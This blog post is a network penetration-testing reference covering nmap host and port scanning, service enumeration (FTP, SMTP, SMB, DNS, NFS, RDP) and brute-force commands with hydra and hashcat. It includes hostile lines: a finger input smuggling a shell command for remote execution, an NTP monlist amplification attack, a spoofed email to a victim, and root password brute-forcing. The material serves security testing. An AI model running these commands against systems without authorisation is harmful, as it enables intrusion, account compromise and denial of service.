Network Vulnerability Assessment Guidelines

1
1

Vulnerability Assessment Guidelines

This document briefs various ways you can use as a reference to check if the services can be exploited. The document necessarily does not cover everything. It should be treated as a reference instead. There are various phases of hacking. I will focus on reconnaissance throughout the document.

Note : Please perform all the pentest related work from a different machine or a virtual machine.

Reconnaissance (Information gathering)

Information gathering is the very first step required before attacking any systems. In this phase you gather information about the target network. Information can be anything ; technologies used , servers hosted in , web applications etc. I will focus on network penetration testing.

General workflow

  1. Find all alive hosts in the network
  2. Perform a port scanning
  3. Perform basic version enumeration and default script scanning with nmap
  4. Check for outdated versions and public exploits
  5. Check for ports and service specific things. For eg if you find ftp then there are several things you can do specifically in ftp like anonymous login
  6. If the service requires authentication then try to guess the passwords or choose a good wordlist. This wordlist is great. You can use tools like hydra to perform a bruteforce attack
  7. There arises various flaws which become vulnerabilities if they are exposed. For eg. memcache which runs in port 11211 does not have to be exposed to the Internet. If it’s exposed then we can make a connection to it. We can look out for such services. Another example is mysql port which does not have to be exposed in the Internet although it requires authentication.

Total number of alive hosts in the network(In this example all alive hosts are saved in a file alive-hosts-unfiltered.txt)

sudo nmap -sn 192.168.254.1/24 -oN alive-hosts-unfiltered.txt

Doing a port scan in all the alive hosts. You can save all hosts in a separate file filtered through alive-hosts.txt. Run the following command. This command saves the output in a file named alive-hosts.txt

cat alive-hosts-unfiltered.txt | grep -i up -B 1 | grep -i report | awk '{print $5}' > alive-hosts.txt

The next step to do is perform a port scanning. This command takes the input from alive-hosts.txt , does port scanning and saves the output in port-scans.txt. It scans for all ports

sudo nmap -p- -iF alive-hosts.txt --disable-arp-ping -n -Pn -oN port-scans.txt

Now the next step to do is find the services associated with those ports alongside basic scripts provided by nmap. The command below finds service associated with the ip with basic vulnerabilities

sudo nmap -sC  -sV -p port ip -oN output

Alternatively, you can run the following command as a whole to reduce the complexity :

  1. The command below scans all ports of 192.168.100.2/24 sub network and saves the output in a file named all-tcp-scans.xml. It takes a while to complete the scan. This scan does port scanning , version enumeration and runs default scripts to check basic misconfiguration.
sudo nmap -sC -sV -p- 192.168.100.2/24 -oX all-tcp-scans.xml
  1. It’s tedious to read the output. You can use the given command to convert it into html and see it in a graphical form

xsltproc all-tcp-scans.xml >> all-subnetworks-scan.html

Now you can open all-subnetworks-scan.html in the browser . Once you open the file in the browser you will see various services , versions and other information. We can do the following :

  1. Check for the public exploit in the Internet. You can check in exploit-db.com Usually only run the verified script.

Note : We have used nmap to perform tcp scans only. Sometimes, there are services which have to be discovered from udp scan. Usually tcp scan works but it’s a good idea to keep udp scan running in the background.

Services based recon

FTP

Anonymous login

You can try logging anonymously , list out and download all the files.

ftp ip
> anonymous
> anonymous
> ls -l

You can alternatively try connecting to the ftp server with

ftp://anonymous:anonymous@ip

Download all files from FTP

wget -m ftp://anonymous:anonymous@ip

SMTP

Basic enumeration

nmap -p 25 --script smtp-commands ip

SMTP user enumeration using nmap

nmap --script smtp-enum-users ip

Send an email

sendEmail -t victim@victim.com -f attacker@victimsite.com -s ip -u Message -a /path/to/file.txt

SSH

Bruteforce passwords

Common ssh passwords : SecList

msf > use scanner/ssh/ssh_enumusers

SMB

Scan the network

nbtscan -t ip/range

Shared list

smbclient --no-pass -L //ip

Connect to the folder

smbclient --no-pass //ip/folder

Mount a shared folder

mount -t cifs //ip/share /mount/here

Scan for eternal blue exploit

sudo nmap --script ms-17-010 -p 445 ip/range

VNC

Connect to VNC

vncviewer -passwd p.txt ip::5901

DNS

Zone Transfer

dig axfr @dns-server-ip domainname.com

DNS Enumeration

use auxiliary/gather/enum_dns

DNS Recon

dnsrecon -r ip/24 -n dnsip

Finger

User Enumeration

finger @ip

Automated Tool

finger-user-enum.pl -U user.txt -t ip

Remote Command Execution

finger "|/bin/ls -a /@example.com"

NFS

Run the following command to list mountable folders

showmount -e ip

Mount

mkdir /tmp/mounthere
mount -t nfs [-o vers=2] ip:/folder /tmp/mounthere -o nolock

NTP

NTP Amplification Attack

ntpdc -n -c monlist ip

Mysql

Connect To MySQL

mysql -h ip -u username -P

MySQL Enumeration

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 ip

RDP

Connect To RDP

rdesktop -u username ip

Nmap Enumeration

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 ip

Bruteforcing

Almost all services that require authentication can be bruteforced. I will list out ways to bruteforce various services .

Cassandra

nmap --script cassandra-brute -p 9160 <IP>

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

hydra -l root -P passwords.txt ip ftp

JWT

hashcat -m 16500 -a 0 jwt.txt wordlist.txt

LDAP

nmap --script ldap-brute -p 389 ip

MYSQL

hydra -L usernames.txt -P pass.txt ip mysql

RDP

hydra -V -f -L <userslist> -P <passwlist> rdp://ip

SMB

nmap --script smb-brute -p 445 ip

SSH

hydra -l root -P passwords.txt ip ssh

Tools used (Web)

Vulnerabilities ScannerDomain
Burp SuiteWeb App/API
OWASP ZAPWeb App/API
Acunetix Vulnerability ScannerWeb App/API
Web technologies Identification
Wappalyzer
BuiltWith
Subdomain Enum tools
Sublist3r
Subfinder
Web Content Scanner
Gobuster
DirBuster
Network
Metasploit
Openvas
Nessus

I would recommend you to install “nessus community edition” which can scan around 16 ips for free.

Coded Brain

Hi , I am an information security enthusiast from Nepal.

Leave a Reply

Your email address will not be published.